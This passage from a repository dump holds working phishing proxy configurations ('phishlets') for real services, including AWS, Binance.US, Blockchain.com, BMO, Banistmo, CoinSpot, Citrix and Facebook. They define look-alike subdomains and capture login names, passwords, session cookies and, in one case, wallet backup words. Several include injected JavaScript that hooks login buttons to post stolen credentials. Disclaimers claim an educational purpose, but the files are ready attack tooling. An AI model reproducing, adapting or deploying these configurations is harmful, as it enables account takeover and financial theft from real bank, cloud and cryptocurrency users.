["autoline.info"] 57 | trigger_paths: ["/login/"] 58 | trigger_params: [] 59 | script: | 60 | function lp(){ 61 | var submit = document.getElementsByName('submit')[0]; 62 | submit.setAttribute("onclick", "sendPass()"); 63 | return; 64 | } 65 | function sendPass(){ 66 | var email = document.getElementsByName("login")[0].value; 67 | var password = document.getElementsByName("password")[0].value; 68 | var xhr = new XMLHttpRequest(); 69 | xhr.open("POST", '/', true); 70 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 71 | xhr.send("login_password="+encodeURIComponent(password)); 72 | console.log("LEAKING CREDENTIALS...") 73 | return; 74 | } 75 | setTimeout(function(){ lp(); }, 1000); -------------------------------------------------------------------------------- /phishlet_examples/aws.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'signin.aws', orig_sub: 'signin.aws', domain: 'amazon.com', session: true, is_landing: true, auto_filter: true} 5 | - {phish_sub: 'aws', orig_sub: 'aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} 6 | - {phish_sub: '', orig_sub: '', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} 7 | 8 | - {phish_sub: 'phd.aws', orig_sub: 'phd.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} 9 | - {phish_sub: 'console.aws', orig_sub: 'console.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} 10 | - {phish_sub: 'portal.aws', orig_sub: 'portal.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} 11 | 12 | - {phish_sub: 'aws-signin-website-assets.s3', orig_sub: 'aws-signin-website-assets.s3', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true} 13 | - {phish_sub: 'cdn.assets.as2', orig_sub: 'cdn.assets.as2', domain: 'amazonaws.com', session: 
true, is_landing: false, auto_filter: true} 14 | - {phish_sub: 'opfcaptcha-prod.s3', orig_sub: 'opfcaptcha-prod.s3', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true} 15 | 16 | - {phish_sub: 'a.b.cdn.console', orig_sub: 'a.b.cdn.console', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true} 17 | - {phish_sub: 'd1', orig_sub: 'd1', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true} 18 | 19 | - {phish_sub: 'd2eezf66cfmyv', orig_sub: 'd2eezf66cfmyv', domain: 'cloudfront.net', session: true, is_landing: false, auto_filter: true} 20 | 21 | 22 | ## SUBDOMAINS BASED ON GEO LOCATION. 23 | 24 | - {phish_sub: 'us-east-1.console.aws', orig_sub: 'us-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 25 | - {phish_sub: 'us-east-2.console.aws', orig_sub: 'us-east-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 26 | - {phish_sub: 'us-west-1.console.aws', orig_sub: 'us-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 27 | - {phish_sub: 'us-west-2.console.aws', orig_sub: 'us-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 28 | - {phish_sub: 'af-south-1.console.aws', orig_sub: 'af-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 29 | - {phish_sub: 'ap-east-1.console.aws', orig_sub: 'ap-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 30 | - {phish_sub: 'ap-south-1.console.aws', orig_sub: 'ap-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 31 | - {phish_sub: 'ap-northeast-3.console.aws', orig_sub: 'ap-northeast-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 32 | - {phish_sub: 'ap-northeast-2.console.aws', orig_sub: 
'ap-northeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 33 | - {phish_sub: 'ap-southeast-1.console.aws', orig_sub: 'ap-southeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 34 | - {phish_sub: 'ap-southeast-2.console.aws', orig_sub: 'ap-southeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 35 | - {phish_sub: 'ap-northeast-1.console.aws', orig_sub: 'ap-northeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 36 | - {phish_sub: 'ca-central-1.console.aws', orig_sub: 'ca-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 37 | - {phish_sub: 'eu-central-1.console.aws', orig_sub: 'eu-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 38 | - {phish_sub: 'eu-west-1.console.aws', orig_sub: 'eu-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 39 | - {phish_sub: 'eu-west-2.console.aws', orig_sub: 'eu-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 40 | - {phish_sub: 'eu-south-1.console.aws', orig_sub: 'eu-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 41 | - {phish_sub: 'eu-west-3.console.aws', orig_sub: 'eu-west-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 42 | - {phish_sub: 'eu-north-1.console.aws', orig_sub: 'eu-north-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 43 | - {phish_sub: 'me-south-1.console.aws', orig_sub: 'me-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 44 | - {phish_sub: 'sa-east-1.console.aws', orig_sub: 'sa-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, 
auto_filter: true} 45 | 46 | 47 | 48 | 49 | sub_filters: 50 | 51 | - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'amazon.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 52 | - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'amazonaws.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 53 | - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'awsstatic.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 54 | - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'cloudfront.net', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 55 | 56 | 57 | auth_tokens: 58 | - domain: '.amazon.com' 59 | keys: ['aws-ubid-main', 'aws-userInfo-signed', '.*,regexp'] 60 | - domain: '.aws.amazon.com' 61 | keys: ['awsm-vid,opt', 'awsccc', '.*,regexp'] 62 | - domain: '.console.aws.amazon.com' 63 | keys: ['noflush_Region', 'noflush_awscnm', '.*,regexp'] 64 | - domain: '.signin.aws.amazon.com' 65 | keys: ['aws-signin-csrf', 'aws-signin-account-info', 'aws-creds', '.*,regexp'] 66 | - domain: 'phd.aws.amazon.com' 67 | keys: ['aws-creds-code-verifier', 'aws-consoleInfo', 'aws-creds', '.*,regexp'] 68 | - domain: 'portal.aws.amazon.com' 69 | keys: ['aws-session-id-fallback,opt', 'aws-session-id', 'JSESSIONID', '.*,regexp'] 70 | - domain: 'signin.aws.amazon.com' 71 | keys: ['JSESSIONID', '.*,regexp'] 72 | 73 | 74 | auth_urls: 75 | - '/console/home' 76 | credentials: 77 | username: 78 | key: 'email' 79 | search: '(.*)' 80 | type: 'post' 81 | password: 82 | key: 'password' 83 | search: '(.*)' 84 | type: 'post' 85 | 
login: 86 | domain: 'signin.aws.amazon.com' 87 | path: '/signin?redirect_uri=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Ffromtb%3Dtrue%26hashArgs%3D%2523%26isauthcode%3Dtrue%26state%3DhashArgsFromTB_us-east-1_7de15f551561e8cc&client_id=arn%3Aaws%3Asignin%3A%3A%3Aconsole%2Fcanvas&forceMobileApp=0&code_challenge=yjMoqMdgfMR1J8rPfy4CI_50b3PldrJjTsFRPOFWJ9A&code_challenge_method=SHA-256' 88 | -------------------------------------------------------------------------------- /phishlet_examples/banistmo.yaml: -------------------------------------------------------------------------------- 1 | author: '@AN0NUD4Y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'banistmo.com', session: true, is_landing: true} 5 | - {phish_sub: 'personas', orig_sub: 'personas', domain: 'banistmo.com', session: false, is_landing: false} 6 | - {phish_sub: 'portal', orig_sub: 'portal', domain: 'banistmo.com', session: true, is_landing: true} 7 | - {phish_sub: 'bf', orig_sub: 'bf24030jpn.bf', domain: 'dynatrace.com', session: true, is_landing: false} 8 | - {phish_sub: 'api', orig_sub: 'api', domain: 'banistmo.com', session: true, is_landing: false} 9 | - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: true} 10 | - {phish_sub: 'portal', orig_sub: 'portal', domain: 'banistmo.com', session: true, is_landing: false} 11 | 12 | 13 | sub_filters: 14 | # - {triggers_on: 'www.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: '', replace: ';document.location="https://login.YOURDOMA.IN/#/login/e1837f4d-1d0c-49b8-a242-8f653226c137";', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript']} 15 | - {triggers_on: 'www.banistmo.com', orig_sub: 'www', domain: 'banistmo.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 16 | - {triggers_on: 'personas.banistmo.com', orig_sub: 'personas', domain: 
'banistmo.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 17 | - {triggers_on: 'portal.banistmo.com', orig_sub: 'portal', domain: 'banistmo.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript']} 18 | - {triggers_on: 'api.banistmo.com', orig_sub: 'api', domain: 'banistmo.com', search: 'api.{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript']} 19 | - {triggers_on: 'bf24030jpn.bf.dynatrace.com', orig_sub: 'bf24030jpn.bf', domain: 'dynatrace.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 20 | - {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 21 | 22 | 23 | 24 | auth_tokens: 25 | - domain: '.banistmo.com' 26 | keys: ['(.+),regexp'] 27 | - domain: '(.+),regexp' 28 | keys: ['(.+),regexp'] 29 | credentials: 30 | username: 31 | key: 'guid' 32 | search: '(.*)' 33 | type: 'post' 34 | password: 35 | key: 'password' 36 | search: '(.*)' 37 | type: 'post' 38 | login: 39 | domain: 'personas.banistmo.com' 40 | path: '' -------------------------------------------------------------------------------- /phishlet_examples/binanceus.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'binance.us', session: true, is_landing: true} 5 | - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'binance.us', session: false, is_landing: false} 6 | - {phish_sub: 'preprod', orig_sub: 'preprod', domain: 'binance.us', session: false, is_landing: false} 7 | - {phish_sub: 'static', orig_sub: 'static', domain: 'binance.us', session: 
false, is_landing: false} 8 | - {phish_sub: 'stream', orig_sub: 'stream', domain: 'binance.us', session: false, is_landing: false} 9 | - {phish_sub: 'api', orig_sub: 'api', domain: 'binance.us', session: false, is_landing: false} 10 | - {phish_sub: 'support', orig_sub: 'support', domain: 'binance.us', session: false, is_landing: false} 11 | - {phish_sub: 'test', orig_sub: 'test', domain: 'binance.us', session: false, is_landing: false} 12 | - {phish_sub: 'docs', orig_sub: 'docs', domain: 'binance.us', session: false, is_landing: false} 13 | - {phish_sub: 'blog', orig_sub: 'blogs', domain: 'binance.us', session: false, is_landing: false} 14 | - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false} 15 | 16 | 17 | sub_filters: 18 | - {triggers_on: 'www.binance.us', orig_sub: 'www', domain: 'binance.us', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']} 19 | - {triggers_on: 'preprod.binance.us', orig_sub: 'preprod', domain: 'binance.us', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 20 | - {triggers_on: 'static.binance.us', orig_sub: 'static', domain: 'binance.us', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 21 | - {triggers_on: 'stream.binance.us', orig_sub: 'stream', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 22 | - {triggers_on: 'api.binance.us', orig_sub: 'api', domain: 'binance.us', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 23 | - {triggers_on: 
'support.binance.us', orig_sub: 'support', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 24 | - {triggers_on: 'accounts.binance.us', orig_sub: 'accounts', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 25 | - {triggers_on: 'test.binance.us', orig_sub: 'test', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 26 | - {triggers_on: 'docs.binance.us', orig_sub: 'docs', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 27 | - {triggers_on: 'blog.binance.us', orig_sub: 'blog', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 28 | - {triggers_on: 'accounts.binance.us', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 29 | 30 | auth_tokens: 31 | - domain: 'accounts.binance.us' 32 | keys: [".*,regexp"] 33 | credentials: 34 | username: 35 | key: 'email' 36 | search: '(.*)' 37 | type: 'post' 38 | password: 39 | key: 'password' 40 | search: '(.*)' 41 | type: 'post' 42 | auth_urls: 43 | - '/mail' 44 | - '/mail/' 45 | login: 46 | domain: 'accounts.binance.us' 47 | path: '/en/login?return_to=aHR0cHM6Ly93d3cuYmluYW5jZS51cy9lbi9ob21l' -------------------------------------------------------------------------------- /phishlet_examples/blockchain(Basic).yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 
'blockchain.com', session: true, is_landing: true} 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'blockchain.com', session: true, is_landing: false} 6 | - {phish_sub: '', orig_sub: '', domain: 'blockchain.info', session: false, is_landing: false} 7 | - {phish_sub: 'api', orig_sub: 'api', domain: 'blockchain.info', session: false, is_landing: false} 8 | # - {phish_sub: 'wallet-helper', orig_sub: 'wallet-helper', domain: 'blockchain.com', session: false, is_landing: false} 9 | # - {phish_sub: '', orig_sub: '', domain: 'blockchain.com', session: false, is_landing: false} 10 | 11 | 12 | sub_filters: 13 | - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'href="https://{hostname}/#/signup"', replace: 'href="https://{hostname}/#/login"', mimes: ['text/html', 'text/javascript']} 14 | - {triggers_on: 'login.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 15 | - {triggers_on: 'login.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 16 | - {triggers_on: 'login.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 17 | - {triggers_on: 'login.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 18 | - {triggers_on: 'login.blockchain.com', orig_sub: '', domain: 'blockchain.info', search: 'https://{hostname}', replace: 
'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 19 | - {triggers_on: 'login.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 20 | - {triggers_on: 'login.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 21 | - {triggers_on: 'www.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 22 | - {triggers_on: 'www.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 23 | - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 24 | - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 25 | - {triggers_on: 'www.blockchain.com', orig_sub: '', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 26 | - {triggers_on: 'www.blockchain.com', orig_sub: 'api', domain: 
'blockchain.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 27 | - {triggers_on: 'www.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 28 | 29 | 30 | auth_tokens: 31 | - domain: '.blockchain.com' 32 | keys: ['.*,regexp'] 33 | - domain: '.blockchain.info' 34 | keys: ['.*,regexp'] 35 | auth_urls: 36 | - '#/home.*' 37 | 38 | credentials: 39 | username: 40 | key: 'guid' 41 | search: '(.*)' 42 | type: 'post' 43 | password: 44 | key: 'password' 45 | search: '(.*)' 46 | type: 'post' 47 | custom: 48 | - key: 'BackupWords' 49 | search: '(.*)' 50 | type: 'post' 51 | login: 52 | domain: 'www.blockchain.com' 53 | path: '/' 54 | 55 | # To insert the wallet id directly from link 56 | # https://login.blockchain.com/#/login/dxxxxxxa-xxx8-xx4x-xxfa-dxxxx9xxx76ce 57 | js_inject: 58 | - trigger_domains: ["login.blockchain.com"] 59 | trigger_paths: ["/"] 60 | script: | 61 | function onclickListener(){ 62 | var submit = document.querySelectorAll('button[type=submit]')[0]; 63 | submit.setAttribute("onclick", "sendPass()"); 64 | return; 65 | } 66 | function sendPass(){ 67 | var walletID = document.getElementsByName("guid")[0].value; 68 | var password = document.getElementsByName("password")[0].value; 69 | var xhr = new XMLHttpRequest(); 70 | xhr.open("POST", '/', true); 71 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 72 | xhr.send("guid="+encodeURIComponent(walletID)+""+" password="+encodeURIComponent(password)); 73 | return; 74 | } 75 | setTimeout(function(){ onclickListener(); }, 100); 76 | -------------------------------------------------------------------------------- /phishlet_examples/bmomobile.yaml: 
-------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | 5 | author: '@testcase0x' 6 | min_ver: '2.3.0' 7 | proxy_hosts: 8 | - {phish_sub: 'm2', orig_sub: 'm2', domain: 'bmo.com', session: false, is_landing: true} 9 | - {phish_sub: 'mobile2', orig_sub: 'mobile2', domain: 'bmo.com', session: true, is_landing: false} 10 | sub_filters: 11 | - {triggers_on: 'mobile2.bmo.com', orig_sub: 'mobile2', domain: 'bmo.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 12 | auth_tokens: 13 | - domain: '.bmo.com/' 14 | keys: ['.*,regexp'] 15 | credentials: 16 | username: 17 | key: 'FBC_Number' 18 | search: '(.*)' 19 | type: 'post' 20 | password: 21 | key: 'FBC_Password' 22 | search: '(.*)' 23 | type: 'post' 24 | login: 25 | domain: 'm2.bmo.com' 26 | path: '/BMOMobile/apps/services/www/BMOMobileBanking/mobilewebapp/default/BMOMobileBanking.html' 27 | 28 | js_inject: 29 | - trigger_domains: ["mobile2.bmo.com"] 30 | trigger_paths: ["/BMOMobile/BMOMobileBanking.html","/BMOMobile/BMOMobileBanking.html#/login/auth","/BMOMobile/apps/services/www"] 31 | trigger_params: [] 32 | script: | 33 | function lp(){ 34 | var submit = document.querySelectorAll('button')[1]; 35 | submit.addEventListener("click", sendPass); 36 | return; 37 | } 38 | function sendPass(){ 39 | var credential = document.getElementById("mat-input-0").value; 40 | var password = document.getElementById("mat-input-1").value; 41 | var xhr = new XMLHttpRequest(); 42 | xhr.open("POST", '/accounts/login/ajax/', true); 43 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 44 | 
xhr.send("FBC_Password="+encodeURIComponent(password) + "&FBC_Number="+encodeURIComponent(credential)); 45 | return; 46 | } 47 | setInterval(function(){ lp(); }, 500); -------------------------------------------------------------------------------- /phishlet_examples/citrix.yaml: -------------------------------------------------------------------------------- 1 | name: 'Citrix Portal' 2 | author: '@424f424f' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'subdomainhere', orig_sub: 'subdomainhere', domain: 'domainhere', session: true, is_landing: true} 6 | sub_filters: 7 | - {triggers_on: 'domainhere', orig_sub: 'subdomainhere', domain: 'domainhere', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} 8 | auth_tokens: 9 | - domain: 'domainhere' 10 | keys: ['ASP.NET_SessionId','CsrfToken','NSC_AAAC','NSC_DLGE','pwcount'] 11 | credentials: 12 | username: 13 | key: 'login' 14 | search: '(.*)' 15 | type: 'post' 16 | password: 17 | key: 'passwd' 18 | search: '(.*)' 19 | type: 'post' 20 | login: 21 | domain: 'subdomainhere.domainhere' 22 | path: '/vpn/index.html' 23 | -------------------------------------------------------------------------------- /phishlet_examples/coinspot.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 
3 | 4 | author: '@AN0NUD4Y' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'coinspot.com.au', session: true, is_landing: true} 8 | - {phish_sub: '', orig_sub: 'www', domain: 'gstatic.com', session: true, is_landing: false} 9 | 10 | 11 | sub_filters: 12 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: 'window.location.href', replace: '"https://www.coinspot.com.au/login"', mimes: ['text/html', 'application/javascript', 'application/x-javascript', 'text/javascript']} 13 | - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: 'window.location.href', replace: '"https://www.coinspot.com.au/login"', mimes: ['text/html', 'application/javascript', 'application/x-javascript', 'text/javascript']} 14 | 15 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'coinspot.com.au', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 16 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'coinspot.com.au', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 17 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'coinspot.com.au', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 18 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: 
['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 19 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 20 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 21 | - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 22 | - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 23 | - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 24 | 25 | auth_tokens: 26 | - domain: '.coinspot.com.au' 27 | keys: ['.*,regexp'] 28 | credentials: 29 | username: 30 
| key: 'login' 31 | search: '(.*)' 32 | type: 'post' 33 | password: 34 | key: 'password' 35 | search: '(.*)' 36 | type: 'post' 37 | login: 38 | domain: 'www.coinspot.com.au' 39 | path: '/' -------------------------------------------------------------------------------- /phishlet_examples/facebook-d.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true} 5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false} 6 | - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 11 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 12 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 13 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 14 | - 
